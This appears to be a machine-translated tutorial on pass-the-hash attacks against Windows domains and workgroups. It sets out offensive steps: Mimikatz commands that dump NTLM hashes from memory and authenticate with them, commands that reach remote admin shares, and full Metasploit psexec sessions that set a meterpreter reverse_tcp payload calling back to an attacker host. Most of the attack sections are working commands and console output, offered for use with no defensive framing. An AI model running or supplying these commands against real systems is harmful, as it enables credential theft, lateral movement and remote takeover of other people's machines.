Intranet penetration hash delivery attack

Preface

In the process of Intranet penetration , When the password of an administrator user is obtained hash When the value cannot be decrypted , Hash passing attacks can be used （Pass The Hash） Horizontal penetration of other machines in the intranet .

0x01 Hash passing attack

Hash passing attack （Pass The Hash） Is based on NTLM A way to attack authentication flaws , An attacker can use the user's password hash value to NTLM authentication . In a domain environment , Many computers will use the same local administrator account and password during installation . If the local administrator account and password of the computer are the same , The attacker can log in to other computers in the intranet by means of hash passing attack .

Pass through hash attacks , Attackers do not need to spend time cracking password hashes to obtain plaintext passwords . Especially in Windows Server 2012 R2 And later versions of the operating system , By default, no clear text password will be recorded in memory , Therefore, attackers often use tools to pass the hash value to other computers for permission verification , Realize the control of other remote computers .

• Detailed explanation of hash passing attack principle ：https://www.4hou.com/posts/V0xO

Working group environment ：

• Windows Vista Previous machines , Users in the local administrator group can be used to attack .
• Windows Vista The machine after that , Can only be Administrator （SID by 500） Only the hash value of the user can be used for hash passing attack , Other users （ Including administrator users but not Administrator） You can't use hash passing attacks , Otherwise, you will be prompted to deny access .

Domain environment ：

• Only users in the domain Administrators group （ It can be a non member of the domain administrator group Administrator user ） The hash value of can be used for hash delivery attack , After a successful attack , You can access any machine in the domain environment .
• SID by 500 Log in with full administrative privileges （“ Full token mode ”） Run all applications , The administrator group's non SID 500 After the account is logged in, there is no UAC Of , All privileges are removed . In some computers ,SID by 500 The account number of will default to Administrator Account name change , It won't affect SID Value .

0x02 Mimikatz

Suppose you get a machine that users in the domain administrator group have logged on to , And get the permission of the local administrator of this machine , Then you can use Mimikatz The tool captures the passwords of users in the local administrator and domain administrator groups at the same time NTLM Hash value .

#  perform  Mimikatz  The command grabs the local password and saves the result to  Mimikatz.log  In file 
mimikatz.exe log "privilege::debug" "sekurlsa::logonpasswords" exit

2.1 Domain environment

use first Mimikatz The tool obtains the user and password in the domain administrator group NTLM Hash as follows ：

 Domain environment ：LUCKYSEC.CN
 Users in the domain Administrators group ：LUCKYSEC\admins
 Users in the domain Administrators group NTLM hash value ：518b98ad4178a53695dc997aa02d455c

because Mimikatz Requires administrator rights to run , Therefore, you need to obtain the local administrator permission of any machine in the domain to run CMD, And then use Mimikatz For the target machine （10.10.10.10） Conduct hash Delivery attack ：

# hash Delivery attack  Mimikatz  Command format ：
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain: Domain  /ntlm:xxxxxx"
#  Examples of use ：
mimikatz "privilege::debug" "sekurlsa::pth /user:admins /domain:LUCKYSEC.CN /ntlm:518b98ad4178a53695dc997aa02d455c"

#  establish IPC$ Connect 
net use \\10.10.10.10
#  List the... Of the target machine C Disk file 
dir \\10.10.10.10\c$    

After successful execution , A new one will pop up CMD Command line window , In this window, you can establish with the target machine IPC$ Successful connection .

occasionally dir Followed by IP The address will prompt the user name or password error , You can solve this problem by entering the host name of the target ：

dir \\AD-2016\c$

2.2 Working group environment

use first Mimikatz The tool obtains the user and password in the domain administrator group NTLM Hash as follows ：

 Get local workgroup Administrator ：Administrator
 Get the local workgroup administrator password  NTLM Hash：518b98ad4178a53695dc997aa02d455c

Suppose the target machine （10.10.10.20） There is the same thing on Administrator The password is the same as the host administrator password taken by the attacker , So the two machines NTLM hash It's the same , So we can do hash Delivery attack .

# hash Delivery attack  Mimikatz  Command format ：
mimikatz "privilege::debug" "sekurlsa::pth /user:administrator /domain: Target machine IP /ntlm:xxxxxx"

#  Examples of use ：
mimikatz "privilege::debug" "sekurlsa::pth /user:Administrator /domain:10.10.10.20 /ntlm:518b98ad4178a53695dc997aa02d455c"

#  establish IPC$ Connect 
net use \\10.10.10.20
#  List the... Of the target machine C Disk file 
dir \\10.10.10.20\c$

0x03 MSF

The first is through the conventional rebound shell Operate to msf On , adopt run post/windows/gather/hashdump Get LM:NTLM hash value

3.1 Domain environment

Attack prerequisites ：

 Domain environment ：LUCKYSEC.CN
 Users in the domain Administrators group ：admins
 Users in the domain Administrators group  LM:NTLM hash  value ：aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c

hash Delivery attack ：

msf6 exploit(windows/smb/psexec) > use  exploit/windows/smb/psexec
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.10
rhost => 10.10.10.10
msf6 exploit(windows/smb/psexec) > set smbuser admins
smbuser => admins
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
msf6 exploit(windows/smb/psexec) > exploit

3.2 Working group environment

Attack prerequisites ：

 Get local workgroup Administrator ：Administrator
 Get the local workgroup administrator password  LM:NTLM hash  value ：aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c

hash Delivery attack ：

msf6 > use  exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set lhost 10.10.10.2
lhost => 10.10.10.2
msf6 exploit(windows/smb/psexec) > set rhost 10.10.10.20
rhost => 10.10.10.20
msf6 exploit(windows/smb/psexec) > set smbuser Administrator
smbuser => Administrator
msf6 exploit(windows/smb/psexec) > set smbpass aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
smbpass => aad3b435b51404eeaad3b435b51404ee:518b98ad4178a53695dc997aa02d455c
msf6 exploit(windows/smb/psexec) > exploit

Reference article

• https://mp.weixin.qq.com/s/T5tJ3GkeNKmyFXyW4CEr1A
• https://cloud.tencent.com/developer/article/1937060
• https://www.cnblogs.com/-qing-/p/11374136.html